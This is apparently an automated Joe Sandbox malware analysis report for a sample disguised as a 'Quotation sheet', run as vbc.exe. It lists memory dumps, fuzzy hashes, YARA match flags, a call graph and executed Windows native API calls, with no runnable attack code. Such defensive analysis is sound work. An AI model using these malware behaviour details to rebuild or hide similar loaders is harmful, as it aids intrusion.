                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d29484e5eb7ae2639fbd5080f34328fb3e9cd63895686926c4071fb0e8dce555
                                                                                                                        • Instruction ID: f151b248fb7b0649e5ddaf43198875b9a9cf5474d4ad2352be8548eb90d2e258
                                                                                                                        • Opcode Fuzzy Hash: d29484e5eb7ae2639fbd5080f34328fb3e9cd63895686926c4071fb0e8dce555
                                                                                                                        • Instruction Fuzzy Hash: DA611B70A142499FD728DF6AE8416AEBFF2FBC8300F14D529D104AB258DF742C05CB90
                                                                                                                        Function 094DA988 Relevance: .2, Instructions: 159COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d130ee4c54573bf4fe78d97d10c787029774a07b9125d4c8a3e6e1d7e029140e
                                                                                                                        • Instruction ID: 6b7ec7d38e7ea75dd025d73e5ad7d40781fc28362e27956016e84a744bc99cc8
                                                                                                                        • Opcode Fuzzy Hash: d130ee4c54573bf4fe78d97d10c787029774a07b9125d4c8a3e6e1d7e029140e
                                                                                                                        • Instruction Fuzzy Hash: 52610B70A182499FD728DF6AE8416AEBFF6FBC8300F14D529D104AB259DF786C05CB90

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                                                                                        Signature Coverage:8.1%
                                                                                                                        Total number of Nodes:136
                                                                                                                        Total number of Limit Nodes:10
                                                                                                                        execution_graph 95257 424b23 95258 424b3f 95257->95258 95259 424b67 95258->95259 95260 424b7b 95258->95260 95261 42c893 NtClose 95259->95261 95267 42c893 95260->95267 95263 424b70 95261->95263 95264 424b84 95270 42ea93 RtlAllocateHeap 95264->95270 95266 424b8f 95268 42c8b0 95267->95268 95269 42c8c1 NtClose 95268->95269 95269->95264 95270->95266 95384 42be73 95385 42be90 95384->95385 95388 5372df0 LdrInitializeThunk 95385->95388 95386 42beb8 95388->95386 95389 42fa13 95390 42fa23 95389->95390 95391 42fa29 95389->95391 95394 42ea53 95391->95394 95393 42fa4f 95397 42cbd3 95394->95397 95396 42ea6e 95396->95393 95398 42cbf0 95397->95398 95399 42cc01 RtlAllocateHeap 95398->95399 95399->95396 95400 424eb3 95404 424ecc 95400->95404 95401 424f17 95402 42e973 RtlFreeHeap 95401->95402 95403 424f27 95402->95403 95404->95401 95405 424f57 95404->95405 95407 424f5c 95404->95407 95406 42e973 RtlFreeHeap 95405->95406 95406->95407 95271 4141e3 95272 4141fd 95271->95272 95277 417983 95272->95277 95274 41421b 95275 414260 95274->95275 95276 41424f PostThreadMessageW 95274->95276 95276->95275 95278 4179a7 95277->95278 95279 4179e3 LdrLoadDll 95278->95279 95280 4179ae 95278->95280 95279->95280 95280->95274 95281 41b4a3 95282 41b4e7 95281->95282 95283 41b508 95282->95283 95284 42c893 NtClose 95282->95284 95284->95283 95408 41a733 95409 41a74b 95408->95409 95411 41a7a5 95408->95411 95409->95411 95412 41e673 95409->95412 95413 41e699 95412->95413 95417 41e790 95413->95417 95418 42fb43 95413->95418 95415 41e72e 95416 42bec3 LdrInitializeThunk 95415->95416 95415->95417 95416->95417 95417->95411 95419 42fab3 95418->95419 95420 42fb10 95419->95420 95421 42ea53 RtlAllocateHeap 95419->95421 95420->95415 95422 42faed 95421->95422 95423 42e973 RtlFreeHeap 95422->95423 95423->95420 95285 4019a4 95286 4019bc 95285->95286 95289 42fee3 95286->95289 95292 42e533 95289->95292 95293 42e559 95292->95293 95304 407123 95293->95304 95295 42e56f 95296 401aaa 95295->95296 95307 41b2b3 95295->95307 95298 42e58e 95299 42e5a3 95298->95299 95322 42cc73 95298->95322 95318 428403 95299->95318 95302 42e5bd 95303 42cc73 ExitProcess 95302->95303 95303->95296 95325 416643 95304->95325 95306 407130 95306->95295 95308 41b2df 95307->95308 95349 41b1a3 95308->95349 95311 41b324 95313 41b340 95311->95313 95316 42c893 NtClose 95311->95316 95312 41b30c 95314 41b317 95312->95314 95315 42c893 NtClose 95312->95315 95313->95298 95314->95298 95315->95314 95317 41b336 95316->95317 95317->95298 95319 428465 95318->95319 95321 428472 95319->95321 95360 4187f3 95319->95360 95321->95302 95323 42cc8d 95322->95323 95324 42cc9e ExitProcess 95323->95324 95324->95299 95326 41665a 95325->95326 95328 416673 95326->95328 95329 42d313 95326->95329 95328->95306 95331 42d32d 95329->95331 95330 42d35c 95330->95328 95331->95330 95336 42bec3 95331->95336 95337 42bee0 95336->95337 95343 5372c0a 95337->95343 95338 42bf0c 95340 42e973 95338->95340 95346 42cc23 95340->95346 95342 42d3cf 95342->95328 95344 5372c11 95343->95344 95345 5372c1f LdrInitializeThunk 95343->95345 95344->95338 95345->95338 95347 42cc40 95346->95347 95348 42cc51 RtlFreeHeap 95347->95348 95348->95342 95350 41b1bd 95349->95350 95354 41b299 95349->95354 95355 42bf63 95350->95355 95353 42c893 NtClose 95353->95354 95354->95311 95354->95312 95356 42bf80 95355->95356 95359 53735c0 LdrInitializeThunk 95356->95359 95357 41b28d 95357->95353 95359->95357 95361 41881d 95360->95361 95367 418d1b 95361->95367 95368 413e53 95361->95368 95363 41894a 95364 42e973 RtlFreeHeap 95363->95364 95363->95367 95365 418962 95364->95365 95366 42cc73 ExitProcess 95365->95366 95365->95367 95366->95367 95367->95321 95372 413e73 95368->95372 95370 413ed2 95370->95363 95371 413edc 95371->95363 95372->95371 95373 41b5c3 RtlFreeHeap LdrInitializeThunk 95372->95373 95373->95370 95424 418f35 95425 42c893 NtClose 95424->95425 95426 418f3f 95425->95426 95427 5372b60 LdrInitializeThunk 95374 413ce8 95375 413cf2 95374->95375 95376 413c86 95374->95376 95379 42cb33 95376->95379 95380 42cb4d 95379->95380 95383 5372c70 LdrInitializeThunk 95380->95383 95381 413c92 95383->95381

                                                                                                                        Executed Functions

                                                                                                                        Function 00417983 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 62 417983-4179ac call 42f553 65 4179b2-4179c0 call 42fb53 62->65 66 4179ae-4179b1 62->66 69 4179d0-4179e1 call 42e003 65->69 70 4179c2-4179cd call 42fdf3 65->70 75 4179e3-4179f7 LdrLoadDll 69->75 76 4179fa-4179fd 69->76 70->69 75->76
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                                                        • Instruction ID: 12297fcb8eb2aa2b345c5072c49cf750d2dc109e2fa89848fb1b39229960a16f
                                                                                                                        • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                                                        • Instruction Fuzzy Hash: 9F0175B5E0010DB7DF10DBE5DC42FDEB7789B14308F4081A6E90897240F678EB488795
                                                                                                                        Function 0042C893 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 87 42c893-42c8cf call 404583 call 42daf3 NtClose
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                                                        • Instruction ID: 97d9e8b69870059a06d295f91f0edce4833e3d1a0b6e8778bec55b4e0ebf6405
                                                                                                                        • Opcode Fuzzy Hash: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                                                        • Instruction Fuzzy Hash: B2E04F322002147BD610AA5AEC41FD7779CDBC5714F004419FA08AB281C6B57A1087F4
                                                                                                                        Function 05372DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 108 5372df0-5372dfc LdrInitializeThunk
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 0a1c69fabc6686464aaf71170ffb92c885d76d67416ed6fd25f92b9c58e0899a
                                                                                                                        • Instruction ID: d00fc5bbd2f813285272a48fd657ef317251c3d48dcab3a490b35aa1ca99fc95
                                                                                                                        • Opcode Fuzzy Hash: 0a1c69fabc6686464aaf71170ffb92c885d76d67416ed6fd25f92b9c58e0899a
                                                                                                                        • Instruction Fuzzy Hash: 4F90023620150413D115715C4584717401A87D0341FD5C852A046455CD965A8A52A121
                                                                                                                        Function 05372C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 107 5372c70-5372c7c LdrInitializeThunk
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: e51d236b05b0f719377291c1685fbd267f04bba3219bf1994fcf65462b28f5d5
                                                                                                                        • Instruction ID: 28a5d4865a2a197c8d0dabb675cee58a607a42c9e67f11166999f64a7bc50b70
                                                                                                                        • Opcode Fuzzy Hash: e51d236b05b0f719377291c1685fbd267f04bba3219bf1994fcf65462b28f5d5
                                                                                                                        • Instruction Fuzzy Hash: 0C90023620158802D114715C848475A401687D0301FD9C851A446465CD869989917121
                                                                                                                        Function 05372B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 106 5372b60-5372b6c LdrInitializeThunk
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 44d1666b6b9b251a433c4b58ae3ddb259d6462d71989e9aebabbf7d3e5b46ced
                                                                                                                        • Instruction ID: 4de08b8d6db3024b32d7c9f721f458df0d3f1f4603926b79210a2d2fd4469c3e
                                                                                                                        • Opcode Fuzzy Hash: 44d1666b6b9b251a433c4b58ae3ddb259d6462d71989e9aebabbf7d3e5b46ced
                                                                                                                        • Instruction Fuzzy Hash: 2A900266202500034109715C4494626801B87E0301BD5C461E1054594DC52989916125
                                                                                                                        Function 053735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: fefb4bccd3fe4ad3f61545ade663b73cee65c080fe8f2db9eb2a2200b556fa7d
                                                                                                                        • Instruction ID: d1bb8f1cfd45e15d71e7fe1f663c8d5dfdfc43d56058d396376f5683ee9d2278
                                                                                                                        • Opcode Fuzzy Hash: fefb4bccd3fe4ad3f61545ade663b73cee65c080fe8f2db9eb2a2200b556fa7d
                                                                                                                        • Instruction Fuzzy Hash: 2090023660560402D104715C4594716501687D0301FE5C851A046456CD87998A5165A2
                                                                                                                        Function 004141D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 72Z53078$72Z53078
                                                                                                                        • API String ID: 1836367815-1643533592
                                                                                                                        • Opcode ID: 5c626eb4c4aa1a6981bfb54bef75fcda53ebc754134984ab69e00bc6286f52e7
                                                                                                                        • Instruction ID: d80221e1f92ecfeadebb637c57095649e674b75548d153b49727efd14be32985
                                                                                                                        • Opcode Fuzzy Hash: 5c626eb4c4aa1a6981bfb54bef75fcda53ebc754134984ab69e00bc6286f52e7
                                                                                                                        • Instruction Fuzzy Hash: 6E11E971D0025C7BEB11AAD59C81DEF7B7CEF81398F41806AF90067241D67C4E468BA5
                                                                                                                        Function 004141B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 15 4141b5-4141b6 16 414202-41424d call 42f423 call 417983 call 404533 call 424ff3 15->16 17 4141b8-4141d4 15->17 26 41426d-414273 16->26 27 41424f-41425e PostThreadMessageW 16->27 17->16 27->26 28 414260-41426a 27->28 28->26
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 72Z53078$72Z53078
                                                                                                                        • API String ID: 1836367815-1643533592
                                                                                                                        • Opcode ID: 4e899c09560dd295b4eea09373e7647fd71c7e42d236753f5ecbf53d49dfd37f
                                                                                                                        • Instruction ID: d97c7e81621f105e2d626c040259cc675ae84d4bd95fa8f473abb00c886a2f57
                                                                                                                        • Opcode Fuzzy Hash: 4e899c09560dd295b4eea09373e7647fd71c7e42d236753f5ecbf53d49dfd37f
                                                                                                                        • Instruction Fuzzy Hash: 6701F972E0515C779B1056D5AC41CEFB77CDFC1398B4180ABFD08A7200D57D4E468BA5
                                                                                                                        Function 004141E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 29 4141e3-4141f5 30 4141fd-41424d call 42f423 call 417983 call 404533 call 424ff3 29->30 31 4141f8 call 42ea13 29->31 41 41426d-414273 30->41 42 41424f-41425e PostThreadMessageW 30->42 31->30 42->41 43 414260-41426a 42->43 43->41
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 72Z53078$72Z53078
                                                                                                                        • API String ID: 1836367815-1643533592
                                                                                                                        • Opcode ID: c4552eebb31196f6cd9f473613f973db0c4a1c859779bfd7a2f9524f38007ed0
                                                                                                                        • Instruction ID: a90ec9ba706184b8e23d88f5e4a1604f18b8a3d9a5187ae4d770ddc4ed241e20
                                                                                                                        • Opcode Fuzzy Hash: c4552eebb31196f6cd9f473613f973db0c4a1c859779bfd7a2f9524f38007ed0
                                                                                                                        • Instruction Fuzzy Hash: 4001C4B2D0025C7ADB10AAE59C81DEF7B7CDF81798F41806AFA04B7241D67C5E468BA1
                                                                                                                        Function 0042CBD3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 77 42cbd3-42cc17 call 404583 call 42daf3 RtlAllocateHeap
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E72E,?,?,00000000,?,0041E72E,?,?,?), ref: 0042CC12
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                                                        • Instruction ID: d487d3b03e5fd870cd6facd5e18d90f17e1e1b45fdd477a7ccf3870962209f68
                                                                                                                        • Opcode Fuzzy Hash: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                                                        • Instruction Fuzzy Hash: 3CE06D71204214BBD714EF99EC41E9B77ACEFC9714F00441EFE08A7281D6B1BA1087B4
                                                                                                                        Function 0042CC23 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 82 42cc23-42cc67 call 404583 call 42daf3 RtlFreeHeap
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,004171FB,000000F4), ref: 0042CC62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                                                        • Instruction ID: 894252dbb0f647bccd5e653401c2ed1b3d00a7f31d77e8cb3dec32718668ce0a
                                                                                                                        • Opcode Fuzzy Hash: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                                                        • Instruction Fuzzy Hash: 44E06D71604204BBD614EE99DC41FDB73ACEFC9710F004419FE08A7241D675B91087B8
                                                                                                                        Function 0042CC73 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 92 42cc73-42ccac call 404583 call 42daf3 ExitProcess
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,9F81E24E,?,?,9F81E24E), ref: 0042CCA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 6abe8fe8e270cf54b7c5ef24c89b3e40668488ce21fc277eab50321fbf2677f2
                                                                                                                        • Instruction ID: 67f0569bf662432a7029b5887b41a7f8390ff6dec00b4f54c651a328d785fc56
                                                                                                                        • Opcode Fuzzy Hash: 6abe8fe8e270cf54b7c5ef24c89b3e40668488ce21fc277eab50321fbf2677f2
                                                                                                                        • Instruction Fuzzy Hash: 0FE046362002147BD620AA5ADC41F9B776CEBC5724F00445AFA08A7281CAB5BA0487B4
                                                                                                                        Function 00417A50 Relevance: 1.5, APIs: 1, Instructions: 24libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 97 417a50-417a51 98 417a53-417a56 97->98 99 4179d8-4179e1 97->99 100 4179e3-4179f7 LdrLoadDll 99->100 101 4179fa-4179fd 99->101 100->101
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                                                        • Instruction ID: 3fde030f9168f7bec8c36b4ed3deb21c83c409ac85ce74226c2ab029a14b000e
                                                                                                                        • Opcode Fuzzy Hash: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                                                        • Instruction Fuzzy Hash: EFE0D875A5410AAFDB10CFC4CC81FDDB778EB04614F0083C7D5289B2C1E234AA4A8781
                                                                                                                        Function 05372C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 102 5372c0a-5372c0f 103 5372c11-5372c18 102->103 104 5372c1f-5372c26 LdrInitializeThunk 102->104
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 9c0c4f252bb58284d3569d0e6fd3166c431799f3393ff842c59cedab4cb9ee4d
                                                                                                                        • Instruction ID: 0128ef326f327df9dd044846892ae092a81043f64327dad05cee8bcf2adb48c0
                                                                                                                        • Opcode Fuzzy Hash: 9c0c4f252bb58284d3569d0e6fd3166c431799f3393ff842c59cedab4cb9ee4d
                                                                                                                        • Instruction Fuzzy Hash: D5B09B76D015C5C5DA15F7644648B27791577D0701F55C461E3070645E477CC1D1E175

                                                                                                                        Non-executed Functions

                                                                                                                        Function 053E8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • The instruction at %p tried to %s , xrefs: 053E8F66
                                                                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 053E8DD3
                                                                                                                        • *** then kb to get the faulting stack, xrefs: 053E8FCC
                                                                                                                        • *** enter .cxr %p for the context, xrefs: 053E8FBD
                                                                                                                        • The critical section is owned by thread %p., xrefs: 053E8E69
                                                                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 053E8DC4
                                                                                                                        • <unknown>, xrefs: 053E8D2E, 053E8D81, 053E8E00, 053E8E49, 053E8EC7, 053E8F3E
                                                                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 053E8E86
                                                                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 053E8E3F
                                                                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 053E8F26
                                                                                                                        • The resource is owned shared by %d threads, xrefs: 053E8E2E
                                                                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 053E8F2D
                                                                                                                        • write to, xrefs: 053E8F56
                                                                                                                        • *** Inpage error in %ws:%s, xrefs: 053E8EC8
                                                                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 053E8E4B
                                                                                                                        • *** enter .exr %p for the exception record, xrefs: 053E8FA1
                                                                                                                        • The resource is owned exclusively by thread %p, xrefs: 053E8E24
                                                                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 053E8FEF
                                                                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 053E8F34
                                                                                                                        • The instruction at %p referenced memory at %p., xrefs: 053E8EE2
                                                                                                                        • a NULL pointer, xrefs: 053E8F90
                                                                                                                        • Go determine why that thread has not released the critical section., xrefs: 053E8E75
                                                                                                                        • an invalid address, %p, xrefs: 053E8F7F
                                                                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 053E8DB5
                                                                                                                        • read from, xrefs: 053E8F5D, 053E8F62
                                                                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 053E8E02
                                                                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 053E8DA3
                                                                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 053E8D8C
                                                                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 053E8F3F
                                                                                                                        • This failed because of error %Ix., xrefs: 053E8EF6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
